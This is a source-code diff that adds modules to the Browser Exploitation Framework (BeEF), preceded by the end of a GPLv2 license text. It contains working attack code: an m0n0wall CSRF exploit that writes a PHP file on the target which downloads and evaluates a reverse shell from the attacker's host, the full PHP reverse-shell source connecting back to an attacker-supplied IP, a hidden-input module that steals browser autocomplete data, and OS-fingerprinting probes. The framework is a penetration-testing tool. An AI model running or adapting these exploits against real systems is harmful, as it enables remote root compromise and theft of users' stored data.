does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.
In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.
3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable
source code, which must be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three
years, to give any third party, for a charge no more than your
cost of physically performing source distribution, a complete
machine-readable copy of the corresponding source code, to be
distributed under the terms of Sections 1 and 2 above on a medium
customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer
to distribute corresponding source code. (This alternative is
allowed only for noncommercial distribution and only if you
received the program in object code or executable form with such
an offer, in accord with Subsection b above.)
The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.
If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.
4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.
5. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.
It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.
This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
convey the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
Also add information on how to contact you by electronic and paper mail.
If the program is interactive, make it output a short notice like this
when it starts in an interactive mode:
Gnomovision version 69, Copyright (C) year name of author
Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, the commands you use may
be called something other than `show w' and `show c'; they could even be
mouse-clicks or menu items--whatever suits your program.
You should also get your employer (if you work as a programmer) or your
school, if any, to sign a "copyright disclaimer" for the program, if
necessary. Here is a sample; alter the names:
Yoyodyne, Inc., hereby disclaims all copyright interest in the program
`Gnomovision' (which makes passes at compilers) written by James Hacker.
<signature of Ty Coon>, 1 April 1989
Ty Coon, President of Vice
This General Public License does not permit incorporating your program into
proprietary programs. If your program is a subroutine library, you may
consider it more useful to permit linking proprietary applications with the
library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License.

6
modules/exploits/m0n0wall/COPYING.PHP-REVERSE-SHELL Normal file
View File

@@ -0,0 +1,6 @@
This tool may be used for legal purposes only. Users take full responsibility
for any actions performed using this tool. The author accepts no liability for
damage caused by this tool. If these terms are not acceptable to you, then do
not use this tool.
In all other respects the GPL version 2 applies.

34
modules/exploits/m0n0wall/command.js Normal file
View File

@@ -0,0 +1,34 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var lhost = '<%= @lhost %>';
var lport = '<%= @lport %>';
var uri = "http://" + rhost + ":" + rport + "/exec_raw.php?cmd=echo%20-e%20%22%23%21%2Fusr%2Flocal%2Fbin%2Fphp%5Cn%3C%3Fphp%20eval%28%27%3F%3E%20%27.file_get_contents%28%27http%3A%2F%2F" + beef.net.host + ":" + beef.net.port + "%2Fphp-reverse-shell.php%27%29.%27%3C%3Fphp%20%27%29%3B%20%3F%3E%22%20%3E%20x.php%3Bcat%20x.php%3Bchmod%20755%20x.php%3B";
beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
if(response.status_code == 200){
function triggerReverseConn(){
beef.net.forge_request("http", "GET", rhost, rport, "/x.php?ip=" + lhost + "&port=" + lport, null, null, null, 10, 'script', true, null,function(response){
if(response.status_code == 200){
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse shell should have been triggered.");
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: second GET request failed.");
}
});
}
setTimeout(triggerReverseConn,5000);
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first GET request failed.");
}
});
});

15
modules/exploits/m0n0wall/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
monowall_reverse_root_shell_csrf:
enable: true
category: "Exploits"
name: "m0n0wall Reverse Root Shell CSRF"
description: "Attempts to get a reverse root shell on a m0n0wall 1.33<br />Vulnerablity found and PoC provided by Yann CAM @ Synetis.<br />For more information refer to <a href='http://www.exploit-db.com/exploits/23202/'>http://www.exploit-db.com/exploits/23202/</a><br />Patched in version 1.34.<br />This exploit make use of <a href='http://pentestmonkey.net/tools/web-shells/php-reverse-shell'>php-reverse-shell from Pentest Monkey</a>."
authors: ["bmantra"]
target:
working: ["ALL"]

28
modules/exploits/m0n0wall/module.rb Normal file
View File

@@ -0,0 +1,28 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Monowall_reverse_root_shell_csrf < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/m0n0wall/php-reverse-shell.php', '/php-reverse-shell', 'php')
end
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = "#{configuration.get("beef.http.host")}"
lhost = "" if lhost == "0.0.0.0"
return [
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'},
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'}
]
end
def post_execute
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('php-reverse-shell.php')
save({'result' => @datastore['result']})
end
end

204
modules/exploits/m0n0wall/php-reverse-shell.php Normal file
View File

@@ -0,0 +1,204 @@
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
//
// Modified version
// ----------------
// This file has been customized to pass ip address and port dynamically with permission of the original author
// See http://beefproject.com
set_time_limit (0);
$VERSION = "1.0";
$ip = $_GET["ip"]; //retrieve ip address to connect back to via HTTP GET
if (!$ip) {
$ip = '127.0.0.1'; // or set static ip address
}
$port = $_GET["port"]; //retrieve port to connect back to via HTTP GET
if (!$port) {
$port = 1234; // or define port here
}
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>

46
modules/host/detect_vm/command.js
View File

@@ -12,25 +12,29 @@ beef.execute(function() {
var result;
var dimensions = {
'320, 200' : '',
'320, 240' : '',
'640, 480' : '',
'800, 480' : '',
'768, 576' : '',
'854, 480' : '',
'1024, 600' : '',
'1152, 768' : '',
'800, 600' : '',
'1024, 768' : '',
'1280, 854' : '',
'1280, 960' : '',
'320, 200' : '',
'320, 240' : '',
'320, 480' : '', // iPhone 4S and earlier
'480, 320' : '', // iPhone 4S and earlier
'640, 480' : '',
'640, 1136' : '', // iPhone 5
'800, 480' : '',
'768, 576' : '',
'854, 480' : '',
'1024, 600' : '',
'1136, 640' : '', // iPhone 5
'1152, 768' : '',
'800, 600' : '',
'1024, 768' : '',
'1280, 854' : '',
'1280, 960' : '',
'1280, 1024' : '',
'1280, 720' : '',
'1280, 768' : '',
'1366, 768' : '',
'1280, 800' : '',
'1440, 900' : '',
'1440, 960' : '',
'1280, 720' : '',
'1280, 768' : '',
'1366, 768' : '',
'1280, 800' : '',
'1440, 900' : '',
'1440, 960' : '',
'1400, 1050' : '',
'1600, 1200' : '',
'2048, 1536' : '',
@@ -46,11 +50,15 @@ beef.execute(function() {
if (dimensions[wh] != undefined) {
result = "Not virtualized";
} else if (beef.hardware.isVirtualMachine()) {
result = "Virtualized";
} else if (beef.hardware.isMobilePhone()) {
result = "Not virtualized";
} else {
result = "This host is virtualized or uses an unrecognized screen resolution";
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result+"&w="+screen.width+"&h="+screen.height);
});

44
modules/host/os_fingerprinting/command.js Normal file
View File

@@ -0,0 +1,44 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var os_version = new Array;
var dom = document.createElement('b');
Array.prototype.unique = function() {
var o = {}, i, l = this.length, r = [];
for(i=0; i<l;i+=1) o[this[i]] = this[i];
for(i in o) r.push(o[i]);
return r;
};
parse_os_details = function() {
if (!os_version.length) os_version[0] = "unknown";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "windows_nt_version="+os_version.unique());
};
// OS fingerprints // in the form of: "URI","NT version(s)"
var fingerprints = new Array(
new Array("5.1+","res://IpsmSnap.dll/wlcm.bmp"),
new Array("5.1+","res://wmploc.dll/257/album_0.png"),
new Array("5.1-6.0","res://wmploc.dll/23/images\amg-logo.gif"),
new Array("5.1-6.1","res://wmploc.dll/wmcomlogo.jpg"),
new Array("6.0+","res://wdc.dll/error.gif")
);
for (var i=0; i<fingerprints.length; i++) {
var img = new Image;
img.name = fingerprints[i][0];
img.src = fingerprints[i][1];
img.onload = function() { os_version.push(this.name); dom.removeChild(this); }
dom.appendChild(img);
}
setTimeout('parse_os_details();', 2000);
});

16
modules/host/os_fingerprinting/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
os_fingerprinting:
enable: true
category: "Host"
name: "Fingerprint Operating System"
description: "This module attempts to fingerprint the Windows Operating System version using the 'res' protocol handler for Internet Explorer. It loads images from DLLs specific to different versions of Windows. This method does not rely on JavaScript objects which may have been modified by the user or browser compatibility mode."
authors: ["bcoles"]
target:
working: IE
not_working: ALL

20
modules/host/os_fingerprinting/module.rb Normal file
View File

@@ -0,0 +1,20 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Uses methods described here:
# http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/
class Os_fingerprinting < BeEF::Core::Command
def post_execute
content = {}
content['windows_nt_version'] = @datastore['windows_nt_version'] if not @datastore['windows_nt_version'].nil?
if content.empty?
content['fail'] = 'Failed to fingerprint Windows version.'
end
save content
end
end

6
modules/network/internal_network_fingerprinting/command.js
View File

@@ -206,7 +206,11 @@ beef.execute(function() {
new Array(
"pfSense",
"443","https",false,
"/themes/pfsense_ng/images/logo.gif",200,56)
"/themes/pfsense_ng/images/logo.gif",200,56),
new Array(
"m0n0wall",
"80","http",false,
"/logo.gif",150,47)
);
// for each ip

1
modules/persistence/confirm_close_tab/command.js
View File

@@ -22,6 +22,7 @@ beef.execute(function() {
if (e.stopPropagation) {
e.stopPropagation();
e.preventDefault();
e.returnValue = "There is currently a request to the server pending. You will lose recent changes by navigating away.";
}
}

2
modules/persistence/confirm_close_tab/config.yaml
View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "Persistence"
name: "Confirm Close Tab"
description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12"
description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12. In Chrome you can't keep opening confirm dialogs."
authors: ["antisnatchor"]
target:
user_notify: ["ALL"]

75
modules/social_engineering/autocomplete_theft/command.js Normal file
View File

@@ -0,0 +1,75 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
steal_autocomplete = function() {
var results = [];
// hijack keys and set focus
get_autocomplete = function (){
window.addEventListener("keydown",function(e){
switch(e.keyCode) {
case 37: // left
scrollTo(window.pageXOffset-20, window.pageYOffset);
break;
case 38: // up
scrollTo(window.pageXOffset, window.pageYOffset-20);
break;
case 39: // right
scrollTo(window.pageXOffset+20, window.pageYOffset);
break;
case 40: // down
scrollTo(window.pageXOffset, window.pageYOffset+20);
break;
default:break;
}
},false);
document.getElementById("placeholder").focus();
}
inArray = function(el, arr){
for (var i = 0;i < arr.length;i++)
if (el===arr[i])
return true;
return false;
}
steal = function(n,v) {
var val = JSON.stringify({'input':n,'value':v});
if (v != "" && !inArray(val,results)){
results.push(val);
//console.log(val);
beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val);
}
}
tt = function(ev) {
if (ev.keyCode == 37 || ev.keyCode == 39) setTimeout(function(){ ev.target.blur(); },100);
}
// create hidden input element
input = document.createElement('input');
input.setAttribute("id", "placeholder");
input.setAttribute("name", "<%= @input_name %>");
input.setAttribute("style", "position:relative;top:-1000px;left:-1111px;width:1px;height:1px;border:none;");
input.setAttribute("type", "text");
input.onkeyup = function(event) { tt(event); }
input.onkeydown = function(event) { tt(event); }
input.onblur = function(event) { steal(this.name,this.value);var o=this;setTimeout(function(){ o.focus();},100);this.value = "";document.body.removeChild(this); }
document.body.appendChild(input);
// steal autocomplete
get_autocomplete();
}
setTimeout("steal_autocomplete();", 100);
});

Some files were not shown because too many files have changed in this diff Show More